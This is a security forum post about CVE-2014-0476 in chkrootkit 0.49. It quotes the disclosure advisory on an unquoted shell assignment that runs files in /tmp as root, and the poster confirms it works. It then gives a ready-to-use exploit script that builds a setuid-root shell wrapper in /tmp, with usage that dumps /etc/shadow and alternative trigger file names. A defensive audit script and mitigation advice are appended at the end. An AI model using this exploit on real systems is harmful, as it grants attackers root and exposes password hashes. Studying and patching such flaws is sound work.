05.06.2014, 18:05   #1
Pashkela

Registered: 05.07.2010
Posts: 1,243
CVE-2014-0476 chkrootkit

chkrootkit => local root privilege escalation with exploit

https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-0476
http://www.openwall.com/lists/oss-security/2014/06/04/9
http://seclists.org/oss-sec/2014/q2/430

** RESERVED ** - lol

Code:
Hi,

 we just found a serious vulnerability in the chkrootkit package, which
 may allow local attackers to gain root access to a box in certain
 configurations (/tmp not mounted noexec).

 The vulnerability is located in the function slapper() in the
 shellscript chkrootkit:

 #
 # SLAPPER.{A,B,C,D} and the multi-platform variant
 #
 slapper (){
 SLAPPER_FILES="${ROOTDIR}tmp/.bugtraq ${ROOTDIR}tmp/.bugtraq.c"
 SLAPPER_FILES="$SLAPPER_FILES ${ROOTDIR}tmp/.unlock ${ROOTDIR}tmp/httpd \
 ${ROOTDIR}tmp/update ${ROOTDIR}tmp/.cinik ${ROOTDIR}tmp/.b"a
 SLAPPER_PORT="0.0:2002 |0.0:4156 |0.0:1978 |0.0:1812 |0.0:2015 "
 OPT=-an
 STATUS=0
 file_port=

 if ${netstat} "${OPT}"|${egrep} "^tcp"|${egrep} "${SLAPPER_PORT}">
 /dev/null 2>&1
 then
 STATUS=1
 [ "$SYSTEM" = "Linux" ] && file_port=`netstat -p ${OPT} | \
 $egrep ^tcp|$egrep "${SLAPPER_PORT}" | ${awk} '{ print $7 }' |
 tr -d :`
 fi
 for i in ${SLAPPER_FILES}; do
 if [ -f ${i} ]; then
 file_port=$file_port $i
 STATUS=1
 fi
 done
 if [ ${STATUS} -eq 1 ] ;then
 echo "Warning: Possible Slapper Worm installed ($file_port)"
 else
 if [ "${QUIET}" != "t" ]; then echo "not infected"; fi
 return ${NOT_INFECTED}
 fi
 }


 The line 'file_port=$file_port $i' will execute all files specified in
 $SLAPPER_FILES as the user chkrootkit is running (usually root), if
 $file_port is empty, because of missing quotation marks around the
 variable assignment.

 Steps to reproduce:

 - Put an executable file named 'update' with non-root owner in /tmp (not
 mounted noexec, obviously)
 - Run chkrootkit (as uid 0)

 Result: The file /tmp/update will be executed as root, thus effectively
 rooting your box, if malicious content is placed inside the file.

 If an attacker knows you are periodically running chkrootkit (like in
 cron.daily) and has write access to /tmp (not mounted noexec), he may
 easily take advantage of this.


 Suggested fix: Put quotation marks around the assignment.

 file_port="$file_port $i"


 I will also try to contact upstream, although the latest version of
 chkrootkit dates back to 2009 - will have to see, if I reach a dev there.


 Keep up the good work,

 Cheers,
 Thomas
In short: if chkrootkit is installed and /tmp is mounted without the noexec option, the system can be rooted
by creating the file /tmp/update (executable: chmod +x /tmp/update) with the needed contents and waiting until the admin runs chkrootkit or chkrootkit itself starts via cron;
/tmp/update will then be executed as root.

it works, by the way!

Linux 2.6.38-16-generic #67-Ubuntu SMP Thu Sep 6 18:00:43 UTC 2012 i686 athlon i386 GNU/Linux

chkrootkit -V
chkrootkit version 0.49


VERIFIED

PS: everyone, go look at /etc/crontab right now and check what is started from there,

and also check:

/etc/cron.d
/etc/cron.daily
/etc/cron.hourly
/etc/cron.monthly
/etc/cron.weekly

exploit (put it in /tmp/update and chmod +x /tmp/update):

Code:
#!/bin/bash
# CVE-2014-0476 chkrootkit => local root privilege escalation
# Author: Pashkela for RDOT.ORG (05.06.2014)
# Restrictions: chkrootkit running from root (for example from CRON) and /tmp not mounted noexec
# tested on chkrootkit version 0.49 and Linux 2.6.38-16-generic #67-Ubuntu SMP Thu Sep 6 18:00:43 UTC 2012 i686 athlon i386 GNU/Linux
# check for chkrootkit: 
# /etc/crontab
# /etc/cron.d
# /etc/cron.daily
# /etc/cron.hourly
# /etc/cron.monthly
# /etc/cron.weekly
 
# path for suid file - but check before that it is not mounted noexec,nosuid
OUTPUT=/tmp
 
cat > sh.c << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* prototypes for setgid/setuid; newer gcc rejects implicit declarations */
int main(int argc, char *argv[])
{
if(argc == 2) {
setgid(0); setuid(0);
system(argv[1]); }
return 0;
}
EOF
gcc sh.c -o $OUTPUT/sh
chown 0:0 $OUTPUT/sh
chmod 4777 $OUTPUT/sh
the suid file /tmp/sh with root permissions will be created after chkrootkit finishes its work

then just:

$ /tmp/sh "id;whoami;cat /etc/shadow"

PS: you can change the path /tmp to another path in the exploit (but check beforehand that it is not mounted noexec,nosuid)

check it (if you have root permissions) - just run chkrootkit

and you can use such names instead of /tmp/update:

/tmp/.unlock
/tmp/httpd
/tmp/.cinik
/tmp/.b

from 2009!

Last edited by SynQ; 16.06.2014 at 11:15. Reason: renamed
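The checks the post recommends (the cron locations, the mount options of /tmp, the file names that slapper() looks for) together with the quoting bug from the quoted advisory, as an added POSIX shell example that is not part of the original post or of chkrootkit itself. The function names, the "uid x|- path" output format, and the use of GNU stat and util-linux findmnt are my own assumptions; the demo function reproduces the unquoted-assignment behaviour inside a private mktemp directory with a file that does nothing but touch a marker.

```shell
#!/bin/sh
# Added example (not from the forum post or from chkrootkit): defender-side checks for
# the CVE-2014-0476 pattern. Function names and the output format are assumptions.

# File names that chkrootkit's slapper() checks under ${ROOTDIR}tmp, per the quoted advisory.
SLAPPER_NAMES=".bugtraq .bugtraq.c .unlock httpd update .cinik .b"

# Return 0 if a mount-option string (as printed by /proc/mounts or `findmnt -o OPTIONS`)
# contains noexec, i.e. the precondition for this bug is NOT met on that filesystem.
opts_have_noexec() {
  case ",$1," in
    *,noexec,*) return 0 ;;
    *)          return 1 ;;
  esac
}

# Print the mount options of the filesystem holding $1 (default /tmp). Assumes util-linux findmnt.
mount_opts_of() {
  findmnt -n -o OPTIONS --target "${1:-/tmp}" 2>/dev/null
}

# Report every slapper() file name present in directory $1, one per line as
# "<owner uid> <x|-> <path>", where x marks an executable file. Any hit deserves a look;
# a non-root-owned executable one is exactly the condition the advisory describes.
slapper_candidates() {
  dir="$1"
  for n in $SLAPPER_NAMES; do
    f="$dir/$n"
    [ -e "$f" ] || continue
    uid=$(stat -c %u "$f")          # GNU stat (Linux) assumed
    mark=-
    [ -x "$f" ] && mark=x
    echo "$uid $mark $f"
  done
  return 0
}

# List the cron files the post tells you to inspect that mention chkrootkit at all.
chkrootkit_in_cron() {
  grep -rl chkrootkit /etc/crontab /etc/cron.d /etc/cron.daily /etc/cron.hourly \
       /etc/cron.monthly /etc/cron.weekly 2>/dev/null
  return 0
}

# Sandbox reproduction of the root cause with a harmless file. With file_port empty,
# `file_port=$file_port $i` is parsed as "run $i with file_port= in its environment",
# so the script $i points to executes; the quoted form is a plain assignment.
# Returns 0 when the unquoted form ran the file and the quoted form did not.
demo_unquoted_assignment() {
  sandbox=$(mktemp -d) || return 1
  printf '#!/bin/sh\ntouch "%s/RAN"\n' "$sandbox" > "$sandbox/update"
  chmod +x "$sandbox/update"
  file_port=
  i="$sandbox/update"

  file_port=$file_port $i           # vulnerable form from chkrootkit 0.49
  unquoted_ran=0
  [ -e "$sandbox/RAN" ] && unquoted_ran=1
  rm -f "$sandbox/RAN"

  file_port="$file_port $i"         # the fix suggested in the advisory
  quoted_ran=0
  [ -e "$sandbox/RAN" ] && quoted_ran=1

  rm -rf "$sandbox"
  [ "$unquoted_ran" = 1 ] && [ "$quoted_ran" = 0 ]
}

# Stand-alone run: summarise the state of this host.
opts=$(mount_opts_of /tmp)
if opts_have_noexec "$opts"; then echo "/tmp: noexec ($opts)"; else echo "/tmp: exec ($opts)"; fi
echo "cron files mentioning chkrootkit:"; chkrootkit_in_cron
echo "slapper() names present in /tmp:"; slapper_candidates /tmp
demo_unquoted_assignment && echo "unquoted assignment executes the file: confirmed"
```

Run it as the user that owns the cron jobs (normally root) to see whether this host is exposed: an exec-mounted /tmp, a cron entry for chkrootkit, and any of the listed names present in /tmp is the combination to act on, and remounting /tmp with noexec or patching the assignment to the quoted form closes it.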